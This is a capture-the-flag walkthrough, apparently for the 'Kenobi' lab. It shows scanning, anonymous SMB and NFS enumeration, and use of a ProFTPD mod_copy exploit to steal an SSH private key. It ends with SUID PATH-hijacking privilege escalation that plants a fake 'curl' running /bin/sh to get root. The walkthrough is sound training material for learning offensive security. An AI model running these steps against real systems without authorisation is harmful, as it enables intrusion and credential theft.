To begin, run nmap -sC -sV -vv -oN nmap/init [IP_ADDR]
to identify any open ports or potentially vulnerable services. This scan returns seven open ports. Using smbclient //
will allow a connection to be made to the discovered SMB shares anonymously. A file called log.txt can be seen, getting this and opening it reveals some configuration information for the ProFTPD server.
Next, run the command provided by the challenge to get the mount:
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [IP_ADDR]
The running version of ProFTPD can be acquired using nc [IP_ADDR] 21
to connect to the FTP port. Once the version is known, an exploit can be found using searchsploit
or general research.
The challenge specifies that the mod_copy exploit should be used to copy kenobi’s RSA key from its source to a destination which can be mounted on the attacking machine (this is what was identified by scanning port 111 above). To copy the file, run the commands shown below.
Following the instructions given by the challenge to mount kenobiNFS and then using ls -la /mnt/kenobiNFS
should give the following output:
Now, kenobi’s RSA key can be copied from /tmp/ and used to login by running:
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@[IP_ADDR]
Privilege Escalation
Looking for an SUID bit as a privilege escalation route, run find / -perm -u=s -type f 2>/dev/null
to see any unusual files. LinEnum can also be used here.
From here, /usr/bin/menu stands out as a non-standard file to have an SUID bit. Running this as is will show a basic options screen.
Performing very basic analysis of this by running strings /usr/bin/menu
will reveal that this binary is not using absolute paths.
This can now be exploited by moving into /tmp and creating a fake instance of curl
. The following will achieve this:
cd /tmp //Move into tmp
echo /bin/sh > curl //Create a file called 'curl' containing /bin/sh
chmod 777 curl //Give the file full read,write,execute permission
export PATH=/tmp:$PATH //Export this to our path
/usr/bin/menu //Run menu again, enter '1' to trigger
Once this shell is acquired, the final flag can be read by simply running cat /root/root.txt
More detailed info on commands etc. used here can be found in my GitBook notes below - happy hacking!